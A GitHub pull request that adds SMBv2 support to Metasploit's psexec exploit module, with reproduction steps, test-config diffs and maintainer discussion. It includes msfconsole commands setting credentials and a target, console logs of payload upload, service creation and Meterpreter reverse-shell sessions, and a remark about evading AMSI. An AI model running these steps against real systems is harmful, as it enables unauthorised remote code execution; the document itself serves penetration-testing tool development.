New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

psexec smb2 support #10185

Merged
merged 12 commits into from Jun 29, 2018

Conversation

Projects
None yet
7 participants
@jrobles-r7
Copy link
Contributor

jrobles-r7 commented Jun 18, 2018

Description

This PR updates the module exploit/windows/smb/psexec to support SMBv2 connection with RubySMB.
SMB1 tests:

  • Windows 7
  • Windows 10

SMB2 tests:

  • cpe:/o:microsoft:windows_10:::x64
  • cpe:/o:microsoft:windows_8.1::sp1:x64
  • cpe:/o:microsoft:windows_server_2008:r2:sp1:x64
  • cpe:/o:microsoft:windows_7::sp1:x64
  • cpe:/o:microsoft:windows_10:1607::x64
  • cpe:/o:microsoft:windows_8.1:::x64
  • cpe:/o:microsoft:windows_server_2008::r2:x64

Verification

  • Setup a Windows 7 system
  • Edit registry HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters
  • SMB1 REG_DWORD with Data 0
  • SMB2 REG_DWORD with Data 1
  • Restart Windows 7
  • ./msfconsole
  • use exploit/windows/smb/psexec
  • set smbuser <user>
  • set smbpass <pass>
  • set target 1
  • set rhost <rhost>
  • run
  • Get a session
  • set target 2
  • run
  • Get a session
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set target 1 
target => 1
msf5 exploit(windows/smb/psexec) > set smbuser IEUser
smbuser => IEUser
msf5 exploit(windows/smb/psexec) > set smbpass 'Passw0rd!'
smbpass => Passw0rd!
msf5 exploit(windows/smb/psexec) > set rhost 172.22.222.152
rhost => 172.22.222.152
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Executing the payload...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.152:49165) at 2018-06-18 14:07:23 -0500
[-] 172.22.222.152:445 - Exploit failed: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec::Failure
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.152 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/psexec) > set target 2
target => 2
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444 
[*] 172.22.222.152:445 - Connecting to the server...
[*] 172.22.222.152:445 - Authenticating to 172.22.222.152:445 as user 'IEUser'...
[*] 172.22.222.152:445 - Uploading payload...
[*] 172.22.222.152:445 - Created \yownzDcO.exe...
[*] Sending stage (179779 bytes) to 172.22.222.152
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.152:49166) at 2018-06-18 14:08:08 -0500
[-] 172.22.222.152:445 - Exploit failed: RubySMB::Error::CommunicationError RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        :
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >
@@ -296,6 +296,8 @@ def call(function, data, do_recv = true)

raw_response = ''

sleep 3

This comment has been minimized.

@jrobles-r7

jrobles-r7 Jun 18, 2018

Contributor

This should probably be handled in a better way...
It seems like a wait needs to occur for the DCE-RPC call.
If a request is sent early, the Windows host will respond with an error code that makes it seem like everything is broken.

@jrobles-r7 jrobles-r7 added the delayed label Jun 18, 2018

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Jun 18, 2018

Jenkins test this please.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Jun 18, 2018

The following will get this PR to run your first testing scenario against Windows 10, since I believe the default target selection would work.

git diff
diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..05b070c8f7 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -41,7 +41,8 @@
             "CPE": "cpe:/o:microsoft:windows_7:::x64"
         },
         {
-            "CPE": "cpe:/o:microsoft:windows_10:::x64"
+            "CPE": "cpe:/o:microsoft:windows_10:::x64",
+            "TESTING_SNAPSHOT": "DisableSMBv1"
         }
     ],
     "TARGET_GLOBALS": {

Or you could make the change to the windows 7 target above if you want the SMBv2 test performed on that OS.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jun 19, 2018

For Windows 10 the automatic target selection attempts to use powershell, which wasn't working in my testing. How would I change the json file to select the native upload target (set target 2)? The native upload target should work on both Windows 7 and Windows 10.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Jun 19, 2018

For now SETTINGS == OPTIONS

diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..01eabfdb43 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -12,7 +12,8 @@
             "NAME": "exploit/windows/smb/psexec",
             "SETTINGS": [
                 "SMBUser=vagrant",
-                "SMBPass=vagrant"
+                "SMBPass=vagrant",
+                "TARGET=2"
             ]
         }
     ],
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jun 19, 2018

I'll try that now 👍

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Jun 21, 2018

Jenkins test this please.

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Jun 21, 2018

Looks like the success condition for the test has changed.

diff --git a/test/modules/exploits/windows/smb/psexec.json b/test/modules/exploits/windows/smb/psexec.json
index c44300cbdc..9779e13b80 100644
--- a/test/modules/exploits/windows/smb/psexec.json
+++ b/test/modules/exploits/windows/smb/psexec.json
@@ -34,7 +34,7 @@
     ],
     "STARTING_LISTENER": 30000,
     "SUCCESS_LIST": [
-        "Session 1 created in the background"
+        "Meterpreter session 1 opened"
     ],
     "TARGETS": [
         {

jrobles-r7 added some commits Jun 18, 2018

@jrobles-r7 jrobles-r7 force-pushed the jrobles-r7:rubysmb-psexec branch 2 times, most recently from eed928b to 31da00b Jun 25, 2018

busterb and others added some commits Jun 25, 2018

@jrobles-r7 jrobles-r7 force-pushed the jrobles-r7:rubysmb-psexec branch from 8cc3063 to 8e36551 Jun 28, 2018

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jun 28, 2018

Woo, it's green! Removing 'delayed'

@busterb busterb self-assigned this Jun 28, 2018

@busterb busterb added enhancement rubysmb and removed delayed labels Jun 28, 2018

@busterb busterb changed the title psexec smb2 support WIP psexec smb2 support Jun 28, 2018

@GreenEYESSS

This comment has been minimized.

Copy link

GreenEYESSS commented Jun 28, 2018

@GreenEYESSS

This comment has been minimized.

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jun 28, 2018

@GreenEYESSS those comments are totally unrelated to this PR, and the second module you linked to doesn't actually work either.

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jun 28, 2018

2003/XP systems seem to return this:

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.104:445 - Connecting to the server...
[*] 192.168.56.104:445 - Authenticating to 192.168.56.104:445 as user 'Administrator'...
[-] 192.168.56.104:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode 0x5b0002
[*] Exploit completed, but no session was created.
@GreenEYESSS

This comment has been minimized.

Copy link

GreenEYESSS commented Jun 28, 2018

ok sorry

jrobles-r7 added some commits Jun 28, 2018

@jrobles-r7 jrobles-r7 force-pushed the jrobles-r7:rubysmb-psexec branch from 71a2b0e to 2856c46 Jun 28, 2018

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jun 28, 2018

Jenkins test this please.

@sempervictus

This comment has been minimized.

Copy link
Contributor

sempervictus commented Jun 29, 2018

Powershell target is likely an AMSI catch. They're actually signing for the bloody architecture resolution part of the cmd invocation which we can drop and force the user to set the right arch for now. Evasions like the metasm C stuff cost space in PSH which pushes us to env-stage (something else they can search for).
Thanks for getting this working - smb1 is getting rare.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jun 29, 2018

The powershell issue with Windows 10 that I was experiencing was resolved in rex-powershell. I will update the description.

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jun 29, 2018

Manual test for Windows 2000:

msf5 exploit(windows/smb/psexec) > set Interrupt: use the 'exit' command to quit
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.102:445 - Connecting to the server...
[*] 192.168.56.102:445 - Authenticating to 192.168.56.102:445 as user 'Administrator'...
[!] 192.168.56.102:445 - No active DB -- Credential data will not be saved!
[*] 192.168.56.102:445 - Uploading payload... qfQlrYxv.exe
[*] 192.168.56.102:445 - Created \qfQlrYxv.exe...
[*] 192.168.56.102:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.102[\svcctl] ...
[*] 192.168.56.102:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.56.102[\svcctl] ...
[*] 192.168.56.102:445 - Obtaining a service manager handle...
[*] 192.168.56.102:445 - Creating the service...
[+] 192.168.56.102:445 - Successfully created the service
[*] 192.168.56.102:445 - Starting the service...
[+] 192.168.56.102:445 - Service started successfully...
[*] 192.168.56.102:445 - Removing the service...
[+] 192.168.56.102:445 - Successfully removed the service
[*] 192.168.56.102:445 - Closing service handle...
[*] 192.168.56.102:445 - Deleting \qfQlrYxv.exe...
[*] Sending stage (179779 bytes) to 192.168.56.102

meterpreter >

@busterb busterb merged commit 2856c46 into rapid7:master Jun 29, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Jun 29, 2018

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Jun 29, 2018

Release Notes

This adds SMBv1 and SMBv2 support for the exploit/windows/smb/psexec module, enabling compatibility with modern Windows environments (well, until SMB Signing is on by default :).

msjenkins-r7 added a commit that referenced this pull request Jun 29, 2018

@jrobles-r7 jrobles-r7 deleted the jrobles-r7:rubysmb-psexec branch Jun 29, 2018

@11ash

This comment has been minimized.

Copy link

11ash commented Nov 5, 2018

guy's help in this guest machine is vulnerable .

[] Started reverse TCP handler on 192.168.43.119:4444
[
] 192.168.43.50:445 - Connecting to the server...
[] 192.168.43.50:445 - Authenticating to 192.168.43.50:445 as user 'pass'...
[-] 192.168.43.50:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_USER_SESSION_DELETED
[
] Exploit completed, but no session was created.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment